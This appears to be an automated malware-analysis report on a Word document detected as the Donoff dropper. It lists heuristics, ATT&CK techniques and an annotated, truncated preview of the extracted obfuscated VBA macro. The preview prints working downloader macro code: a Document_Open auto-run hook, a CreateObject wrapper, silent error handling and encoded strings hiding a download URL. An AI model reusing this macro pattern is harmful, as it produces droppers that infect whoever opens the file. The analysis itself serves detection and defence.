MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a Document_Open macro and multiple high-severity VBA heuristics (CreateObject, CallByName, p-code auto-execution) strongly indicate malicious VBA code execution. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' further supports this, suggesting the file acts as a dropper. The VBA code itself is heavily obfuscated, preventing a detailed analysis of its specific actions, but the overall pattern points to a macro-based downloader.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN — Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ — CreateObject call
-
CallByName call — high — OLE_VBA_CALLBYNAME — CallByName call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19124 bytes |
| SHA-256: e7660d8edaddb4429e65ac0c54135c23db3ede8a7002436bc88cf26f3a0bd254 | | | |
|||
Preview script — First 1,000 lines of the extracted script
' Export metadata for the first module, ThisDocument (written by the VBA exporter, not
' executable code). Document_Open further down lives in this module, which is why it can
' run automatically when the document is opened.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Not referenced anywhere in the visible preview, and every procedure it calls
' (aCaLm, mLQsxUPPTJ, WdUmxffP, OPDnEP, ...) is likewise undefined in the preview.
' Together with the random-looking names and literals this reads as filler/junk code
' that bloats the module and dilutes simple signatures -- confirm against the full
' macros.bas before discounting it.
Private Sub uGJawhoPl(ByVal DkzEbBO As String, ByVal jzVdFNMkiT As Integer)
aCaLm True, "RsFG3hVPgllMN5A4ZpCpa8pIQjkJU", 9044
mLQsxUPPTJ "egrMfXGIi0VoevHdTPVxXa6YJke2Q1zz", "SBmmrkh9RUyQMITRjxxGQ0kmz1486ZxL"
zHfiyGDEUev
GcjMk = 6741
If WdUmxffP("Rot743J4TT7P2mUfGzDpTC7Sd", 886, 440) Then
fxCnaGxZb = 9024
OPDnEP
dDBjDHligGEZ 1883
jrPEqOJDZbQZ = 3192
AjCcpoCuFnEwuT "z4vlidUCRHOjjYk2hMSILqNxjL"
DWfWT = "QTivYTBreGNCaTBi1HOe"
Else
BBlYIUHenuxdL 653, 5024, 4694
OSheObzblV "tOTyGb7n6HRXUpvTSPzNEzXA6h", 9258
NgDvqDA
fwxTALCtkYPSe = False
End If
End Sub
' Same pattern as uGJawhoPl: unreferenced from the visible Document_Open call chain and
' calls only names that do not exist in the preview. Treat as probable filler until the
' full source says otherwise.
Private Sub kfuqEWKlk(ByVal IrnBoZayGBR As Integer)
kMPlaaVbDKFpE "mQc264z2T8rPMpHprMTKKf3ziSW7IK", "jyBkcb0PdKCjVglUyi", "9c9mxfsZS9GJoXFofa2F72SperdSp7CzN"
KanKdyJYL = 358
ktcpf
PcUqcKhpXU = "a7AEiWudr2w5WGNkgZs"
If tJIJFldHujB(True, 55, True) Then
WZYWs = 4069
ERsznkBiazyS 555, "jaubWPnLpeqgVNL9ME84XxXJJITj5FQ6p", 2131
VXzDeZQUOWBeoG = "Xy5MIxz7AEDrQ7E3hZLqqGEl0"
RqLiAiQrLZLf
Else
ESReOSNOqIv
PKUilaCSBqqupr 9355
NMNeFRDkkVG = "TSsXKofssPzAHsqQUETEn54ybsC5bha"
End If
End Sub
' Auto-execution entry point: Word runs Document_Open when the file is opened with macros
' enabled (the OLE_VBA_DOCOPEN finding above). Both Dim'd locals are never used; the only
' real work is the call into module ghHmpSVswVcRd.jxKDs. The execution chain visible in
' this preview is therefore Document_Open -> jxKDs -> zYUaYgWO -> WbntgcNCat; nothing
' else in the ThisDocument module is reached from here.
Private Sub Document_Open()
Dim ywYJqwjKpOFbtW As Integer
Dim BGpbdbRp As Boolean
ghHmpSVswVcRd.jxKDs
End Sub
' Start of the second module, ghHmpSVswVcRd -- the module Document_Open calls into.
Attribute VB_Name = "ghHmpSVswVcRd"
' Unreferenced in the preview and calls only undefined names -- probable filler.
Private Sub lCTKxpVdhNsq(ByVal dQzPQdsjeQOzE As String, ByVal ftmtlcMHVjSLs As String)
GFHzDHDgei "MsvPxro6k9JhO0TbtCPPDuLKRzBM"
dETXBUnuHn = "cJsS44dr0kH2evGmEjrf"
HLpczTXnnV "icWB3QYURqVDed0s5pyB97w", "zHLmEEuWX7jTsXpKyGyo8fksDnm", True
End Sub
' Unreferenced in the preview and calls only undefined names -- probable filler.
Private Sub YBRtAfkz(ByVal jBdJOHN As Integer, ByVal ujcCQW As String)
bXiJXdnXpSOuER 3110
mSIrt = 6371
qQmaFqqVIfyDJG "v6ZjcNChcCAbA756GvWMTik9CMlT", "AHTeso1D3mt9vDnjmjbPIQmojxZg"
gthNQnYcV = True
krhAqu
End Sub
' Unreferenced in the preview; three bare calls to names that do not exist here.
Private Sub LUgAPO(ByVal lxSrxsUMMCsNBS As String, ByVal QpCXYcDFDLKcA As Boolean)
KBsrfXwNpP
eInxfoau
DhniWMsUdDqG
End Sub
' Thin wrapper around CreateObject (the OLE_VBA_CREATEOBJ finding). The ProgID arrives as
' the parameter slcZsor, so the COM class being instantiated is not visible at this site
' and is only known from whatever (likely decoded) string a caller passes. The result is
' routed through LBlKbwunk, an identity function, purely as an extra indirection hop.
' KwrUqzsvJLolM and both locals are unused. No caller is visible in the preview.
Public Function bFyULe(ByVal slcZsor As String, ByVal KwrUqzsvJLolM As String) As Object
Dim JeYUFcs As Integer
Dim PbZHGfpAAsEy As String
Set bFyULe = LBlKbwunk(CreateObject(slcZsor))
End Function
' Reached directly from Document_Open. On Error GoTo frHuwhIAGMJv with an empty handler
' means any runtime error in the three calls below is swallowed, so the macro fails
' silently instead of surfacing an error dialog to the user. The two LsjLKNYlSkK calls
' target a module that is not in the preview; zYUaYgWO (below) holds the visible logic
' that consumes the decoded strings. Both locals are unused.
Public Sub jxKDs()
Dim NHWwZtzFoGH As String
Dim qPHmZLhtuqE As Integer
On Error GoTo frHuwhIAGMJv
LsjLKNYlSkK.edvyADiLxt
LsjLKNYlSkK.eYlMAwjMYvXey
zYUaYgWO
Exit Sub
frHuwhIAGMJv:
End Sub
' Unreferenced in the preview and calls only undefined names -- probable filler.
Private Sub zcQbFtuwKd(ByVal nInHxSIkGpqB As String)
EnuFJzceumOZPS = "pJLxrKJz9S02hq7DyTgnvlkpG"
If qcUOZZOsrnm Then
DyWUZwc False, "zTP72EaAEu1Z98IqCpAb2Zpx"
wSYCpRRKN
xXmqlMjVYHYg True
Else
uQzfSi 2123
End If
BGETg "mgNM7T5AJoOh3ZfdLDJ67n", 972
End Sub
' Identity function: returns its argument unchanged. Its only role is to put one more
' call between CreateObject and the object's use in bFyULe. The local is unused.
Private Function LBlKbwunk(ByVal JZHdouWIY As Object) As Object
Dim WzFxigbLicP As Integer
Set LBlKbwunk = JZHdouWIY
End Function
' Called from zYUaYgWO with mKFvPAtxHqhrs = vpJmyxet(), the decoded URL-like string.
' KznlPEmuafBuL, wONyMkmVlhpHC and LGNpwJse live outside the preview, so the exact
' operations cannot be confirmed here. What is visible: the decoded strings
' JDjVYEhjIGYlV and CHSpBhbbIcQ and the decoded URL all flow into these three calls,
' which is the shape of a fetch-and-handle routine -- verify against the full source.
' Only AzDOJUo and mKFvPAtxHqhrs are used; IOlUpBYWm is ignored.
Private Sub WbntgcNCat(ByVal AzDOJUo As String, ByVal IOlUpBYWm As String, ByVal mKFvPAtxHqhrs As String)
Set eVaUzTJ = KznlPEmuafBuL.sOuLR(True, mKFvPAtxHqhrs)
KznlPEmuafBuL.qxMjgLZZie JDjVYEhjIGYlV, 2670, "FxPPgcVqBRHoZgW6cgonHfmHuaBsT", eVaUzTJ
wONyMkmVlhpHC.GIPAak LGNpwJse.CdLCElatFIApo(CHSpBhbbIcQ, eVaUzTJ, 8879), False, "SLhD3p4tO1joUata7mBo3o", AzDOJUo
End Sub
' Orchestrator reached from jxKDs. Hands wONyMkmVlhpHC.pPPsRgLwu (a value from a module
' outside the preview) and the decoded string vpJmyxet() to WbntgcNCat, then calls
' wONyMkmVlhpHC.wbbJzsoNxEEk with the same value. tKoax is declared but never used.
Private Sub zYUaYgWO()
Dim tKoax As Boolean
WbntgcNCat wONyMkmVlhpHC.pPPsRgLwu, "iq1VrlX3DXmVACFs475taCI1UR", vpJmyxet
wONyMkmVlhpHC.wbbJzsoNxEEk False, 618, wONyMkmVlhpHC.pPPsRgLwu
End Sub
' String-decoding stub: the plaintext is only recovered at runtime by
' lWKoEyBev.LMxEWodRNey, whose body lies past the truncated end of the preview, so the
' algorithm is unconfirmed. The second argument looks like a set of filler characters to
' strip from the first; under that reading this yields a short English error message, not
' an indicator. Because the plaintext never appears in the source, static string rules
' must match the encoded literal or the decoder itself.
Private Function JDjVYEhjIGYlV() As String
JDjVYEhjIGYlV = lWKoEyBev.LMxEWodRNey("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
' Same decoding scheme. Under the filler-strip reading the result resembles a property
' name read from an HTTP response object, which fits the downloader assessment above --
' confirm by running the real LMxEWodRNey routine rather than decoding by hand.
Private Function CHSpBhbbIcQ() As String
CHSpBhbbIcQ = lWKoEyBev.LMxEWodRNey("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
' Same decoding scheme applied to the longest literal; the ':' and '//' surviving between
' filler characters show this is the obfuscated HTTP URL that zYUaYgWO passes to
' WbntgcNCat. Recover it with the actual LMxEWodRNey routine (not by hand) before
' recording it as a download-location IoC. It is absent from the EMBEDDED_URL findings
' above, which suggests the URL extractor did not decode macro strings.
Private Function vpJmyxet() As String
vpJmyxet = lWKoEyBev.LMxEWodRNey("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
' Start of the third module, lWKoEyBev, which hosts the LMxEWodRNey string decoder used
' above. The preview is truncated shortly after this point, before the decoder is shown.
Attribute VB_Name = "lWKoEyBev"
Private Function jCzCidQYfBv(ByVal mJtdBscGjpHLkG As Integer, ByVal dqrmmKGXEhnRYQ As Intege
... (truncated)
|
|||